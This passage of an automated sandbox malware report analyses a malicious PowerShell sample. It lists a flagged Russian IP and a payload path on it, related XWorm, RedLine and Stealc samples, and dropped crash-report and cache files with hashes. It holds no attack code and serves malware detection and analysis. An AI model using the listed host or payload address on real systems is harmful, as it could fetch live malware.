      92.255.57.1550%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      92.255.57.155true
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1688656796.000001E71BBF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1673465265.000001E70D1CE000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1673465265.000001E70BA88000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1673465265.000001E70BA88000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://go.micropowershell.exe, 00000000.00000002.1673465265.000001E70CA36000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://contoso.com/powershell.exe, 00000000.00000002.1673465265.000001E70D1CE000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1688656796.000001E71BBF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1673465265.000001E70D1CE000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/Licensepowershell.exe, 00000000.00000002.1673465265.000001E70D1CE000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://contoso.com/Iconpowershell.exe, 00000000.00000002.1673465265.000001E70D1CE000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://upx.sf.netAmcache.hve.0.drfalse
                        		high
                        https://aka.ms/pscore68powershell.exe, 00000000.00000002.1673465265.000001E70B861000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1673465265.000001E70B861000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3156793312.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1673465265.000001E70BA88000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              92.255.57.155
                              		unknownRussian Federation
                              		42253TELSPRUtrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1577167
                              Start date and time:2024-12-18 08:14:13 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 7m 56s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:15
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:QP2uO3eN2p.ps1
                              renamed because original name is a hash value
                              Original Sample Name:7dc08327ae721c3ecf12447901858457bf510dd7016838839a629f86d673b18b.ps1
                              Detection:MAL
                              Classification:mal100.troj.evad.winPS1@9/14@0/1
                              EGA Information:
                              • Successful, ratio: 50%
                              HCA Information:
                              • Successful, ratio: 94%
                              • Number of executed functions: 96
                              • Number of non-executed functions: 23
                              Cookbook Comments:
                              • Found application associated with file extension: .ps1
                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 20.189.173.20, 40.126.53.13, 4.175.87.197, 13.107.246.63
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target powershell.exe, PID 5968 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                              • Report size getting too big, too many NtSetInformationFile calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              02:15:23API Interceptor41x Sleep call for process: powershell.exe modified
                              02:15:27API Interceptor5070157x Sleep call for process: RegSvcs.exe modified
                              02:15:36API Interceptor1x Sleep call for process: wermgr.exe modified
                              02:18:04API Interceptor1x Sleep call for process: WerFault.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              92.255.57.155anyrunsample.ps1Get hashmaliciousUnknownBrowse
                              • 92.255.57.155/1/1.png
                              https://reviewgustereports.com/Get hashmaliciousCAPTCHA Scam ClickFix, XWormBrowse
                              • 92.255.57.155/1/1.png

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              TELSPRUmhqxUdpe7V.ps1Get hashmaliciousXWormBrowse
                              • 92.255.57.155
                              MiGFg375KJ.exeGet hashmaliciousXWormBrowse
                              • 92.255.57.155
                              anyrunsample.ps1Get hashmaliciousUnknownBrowse
                              • 92.255.57.155
                              sEOELQpFOB.lnkGet hashmaliciousRedLineBrowse
                              • 92.255.57.75
                              ref095vq842r70_classement_atout_france.pdf.lnk.d.lnkGet hashmaliciousRedLine, SectopRATBrowse
                              • 92.255.57.75
                              fa20b849ebe7c53d59f3ed0fcfac8445ea08e7296af5a.exeGet hashmaliciousStealcBrowse
                              • 92.255.57.89
                              LXS5itpTK7.exeGet hashmaliciousStealcBrowse
                              • 92.255.57.89
                              SEejSLAS9f.exeGet hashmaliciousStealcBrowse
                              • 92.255.57.89
                              mMgFHz9PdG.exeGet hashmaliciousStealcBrowse
                              • 92.255.57.89
                              vCZfRWB1kd.exeGet hashmaliciousStealcBrowse
                              • 92.255.57.89

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_6ffd24152b5e9a3a3eb1fb64c4ad5c89541278d_74bcc9ed_4ba80e18-6159-4399-8440-5c696cf9801a\Report.wer

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):1.2142835581447349
                              Encrypted:false
                              SSDEEP:192:OYlQHlk8QUoqz0BU/Sa6egt0GopzuiFUZ24IO8a9:hw3QjVBU/Saqtv+zuiFUY4IO8a9
                              MD5:1FD06AE5152FE36DCE80834E2840566A
                              SHA1:F809193961C5745EAFC57CB77F2F70B5BC6888D5
                              SHA-256:6E69A7DDC06BE0B0D3078412435599476FF04E1B60DE60CD8D0DD9DA745FDB3F
                              SHA-512:032947BA17AF91082E9072C119836834DBE5EE18225F70F13114BD641E9C41C6A16E1BF7CCA16373A0E109AD4EB8AEAA3F3A43B62CA4B85A3D3F368D17DBC097
                              Malicious:false
                              Reputation:low
                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.9.7.9.8.7.9.0.4.9.1.9.5.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.9.7.9.8.7.9.5.8.0.4.4.9.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.b.a.8.0.e.1.8.-.6.1.5.9.-.4.3.9.9.-.8.4.4.0.-.5.c.6.9.6.c.f.9.8.0.1.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.9.5.b.b.0.9.b.-.0.9.6.4.-.4.2.3.2.-.a.8.9.0.-.b.5.1.3.6.0.0.f.0.1.9.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.2.0.-.0.0.0.1.-.0.0.1.4.-.2.f.a.6.-.f.6.9.a.1.c.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.1.9.6.9.7.7.1.b.2.f.0.2.2.f.9.a.8.6.d.7.7.a.c.4.d.4.d.2.3.9.b.e.c.d.f.0.8.d.0.7.

                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_cff3fccfaef89fe97e70f334411924bd667e9abb_00000000_807c381f-279d-45a8-887e-ccd7dafd6f29\Report.wer

                              Download File
                              Process:C:\Windows\System32\wermgr.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):0.5318307310585444
                              Encrypted:false
                              SSDEEP:96:TSrn+FMAjirxYidgRH3Uje0e35/3ooLF1QXIGZAX/d5FMT2SlPkpXmTAJf/VXT5t:92iimGgR30m8AzuiFRZ24lO8
                              MD5:E3310AFA7F21399BC86B453E73E58436
                              SHA1:42C3BC65478A34B89B56B12FFE1BB742534D491D
                              SHA-256:90389CC4E78CEA46FB45778D8B77ED77BE961A5F705F0D26C9F735C7593CDC0B
                              SHA-512:A2752A7A972CC6C180C0E52CEE50DAB912360053947F55D2EEBCE6621652524BCBB8EE0FF31902E8E237B8E4C7BF7680DE5080121CFF4F578BFB5C4B23D5B726
                              Malicious:false
                              Reputation:low
                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.9.7.9.7.7.2.1.6.5.1.4.8.9.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.9.7.9.7.2.4.3.6.1.2.3.7.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.0.7.c.3.8.1.f.-.2.7.9.d.-.4.5.a.8.-.8.8.7.e.-.c.c.d.7.d.a.f.d.6.f.2.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.5.0.-.0.0.0.1.-.0.0.1.4.-.f.9.c.b.-.3.8.9.9.1.c.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER58DA.tmp.dmp

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 07:17:59 2024, 0x1205a4 type
                              Category:dropped
                              Size (bytes):362291
                              Entropy (8bit):3.426765514257989
                              Encrypted:false
                              SSDEEP:3072:iarx17c4uEqIy2yLTgYa+WjL7X69PXa/lhZTWydDIib:icx17c4xyLTgYtKL7Xn/l3NdDT
                              MD5:5404928F25CFA02CA67D8628A9B87E15
                              SHA1:584399409ACC691F9C079C7D42289B6B7025D481
                              SHA-256:4B4B0D956820ED3664ED28218EB8BE55B95F3DBD2CBD1478821B4E1ECE042BBD
                              SHA-512:C672F659B1B692C441100C3CD9AFED152C28B4BC8219918E4A42F5722B939D130267F5B37125E399769E176E6B51CBCEF0175271A2329359CDDA5A0BE7628E86
                              Malicious:false
                              Reputation:low
                              Preview:MDMP..a..... .......'wbg............d...........<...x.......$....).......*...j..........`.......8...........T............E..sA...........)...........+..............................................................................eJ......\,......GenuineIntel............T....... ....vbg....f........................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER5A33.tmp.WERInternalMetadata.xml

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8360
                              Entropy (8bit):3.691380624078792
                              Encrypted:false
                              SSDEEP:192:R6l7wVeJMfk67a6YBWfSLegmfZ8vprf89bB9sfZRLm:R6lXJMc6W6YBGSCgmfOyB2fa
                              MD5:24D2420A49FE15499B79B16DC40AEB82
                              SHA1:FEB78DF597872745B75A62F83A29FE66D4720BBB
                              SHA-256:BDE61A54EEB6C7A13075D14C81A96CE6E04EAF0B56D87979AA0B876C8FD5E1CA
                              SHA-512:38002F176B8A93F52D5EEF2B7BB03D7ECE67A0A1BF84A37ADF5A68D7B51E36886D9D31250FA56F0F33E986029BDF6AC444F63D75BCFBF5B6B6AF4315B81DE7F9
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.0.5.6.<./.P.i.

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER5A63.tmp.xml

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4728
                              Entropy (8bit):4.445659107027491
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zsOJg77aI9NiWpW8VY4Ym8M4J3cFW+q8vYwlmDIDwMrd:uIjfEI7/j7VoJzKBlmDILrd
                              MD5:4B353C3E80292F0A82F3E4D4466907C7
                              SHA1:BA4658E03C26269C8702976C4B7D11B2FC33734E
                              SHA-256:0B332F6F7A3FCF3B292882E2F1C1751FBA589E07F43F4A172852DEE939E32CE6
                              SHA-512:954603CDA9419103F43FA216604E76602428D187CC859753D26855CC9449314821C1CF384C5D1C3D2D34F865E954455C2C88E30D7B3D7376B940967AFFF39664
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636380" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB24.tmp.WERInternalMetadata.xml

                              Download File
                              Process:C:\Windows\System32\wermgr.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):7286
                              Entropy (8bit):3.7361959397539373
                              Encrypted:false
                              SSDEEP:96:RSIU6o7wVetbpkQuQYBYl6Y274FIgmfHNpX6PbVF5aMS895QGm:R6l7wVeJpkZdul6YS4FIgmftYtpS8bm
                              MD5:0B3DCDC85CE8C8DC5359A99738BD1A02
                              SHA1:74275DF68A2E9CC178791C2CE4AED440E0B932C7
                              SHA-256:51DC2E83E460C56E596613FA41B807D6B2AEF3151CD79D8180122A14E175EE0D
                              SHA-512:9B7FC0467221C4B5AC77F023DC9B39001361FF156849454068DB8CB84BB6653FF5683F4D115CAC53D4E5FD4F14CD7FDA1813A32CD832EA551A8D9B0AC9DCD28B
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.9.6.8.<./.P.i.

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB63.tmp.xml

                              Download File
                              Process:C:\Windows\System32\wermgr.exe
                              File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4905
                              Entropy (8bit):4.692457403227203
                              Encrypted:false
                              SSDEEP:96:uIjfnnI7uj7V4JFKloFevAFW+WTzFevAFj/ufTd:uIznYuj7245H5syufh
                              MD5:96A902CA7C4109192385935DFBA5E43A
                              SHA1:40E0C3367983F5AF69CD9DAE01269966DC3ACA8A
                              SHA-256:125F6E63056AE1A4E7254F422FA119257CC82DB9E5F0E2DFEDFBF950F5A378E3
                              SHA-512:D03EFBCB439C1CD4462ACA78591466FCDB8BB76D1A49AF42C75B2B4D27327156CEA5A72CE72E0AB6283EE1409787915241EEA259A0421DBDE63CE9AD4C6C6FC0
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636378" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):11608
                              Entropy (8bit):4.890472898059848
                              Encrypted:false
                              SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                              MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                              SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                              SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                              SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                              Malicious:false
                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):64
                              Entropy (8bit):1.1940658735648508
                              Encrypted:false
                              SSDEEP:3:NlllulVmdtZ:NllUM
                              MD5:013016A37665E1E37F0A3576A8EC8324
                              SHA1:260F55EC88E3C4D384658F3C18C7FDEF202E47DD
                              SHA-256:20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
                              SHA-512:99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
                              Malicious:false
                              Preview:@...e................................................@..........

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ghocidx0.svd.psm1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_raxan3yr.n0w.ps1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6222
                              Entropy (8bit):3.73014591243326
                              Encrypted:false
                              SSDEEP:48:Q5tBQaOoCnWU23seukvhkvklCyw7tkewbbBl1BSogZoRjEewbbBl/BSogZoRv1:Wj7CnP8mkvhkvCCt72NbBwHkINbB2Hkd
                              MD5:C7DC63B1E0E3369EDDA2F6E1F61E5CEB
                              SHA1:351E42A16AF3EFBBEB4267BF352CABE11A2045F0
                              SHA-256:A514259E49348FA4C05F4EC6C84460300C95E3CF563DBCB9ACF9646182F0F015
                              SHA-512:A9254C14F0DB740DF5735353410F9C7D9035E193F5448962EFC0DD6CCEDE6031054E108E068DEE41DB455D12674C6796DA54BD1D3E65045F542688A61A59D9D2
                              Malicious:false
                              Preview:...................................FL..................F.".. ......Yd.....K..Q..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd.......Q....Z..Q......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.Y.9..........................d...A.p.p.D.a.t.a...B.V.1......Y.9..Roaming.@......EW)B.Y.9..............................R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B.Y.9............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B.Y.9............................*.W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B.Y.9....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B.Y.9....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B.Y.9.....0..........

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8WO0IPY70FDO0YM18CNP.temp

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6222
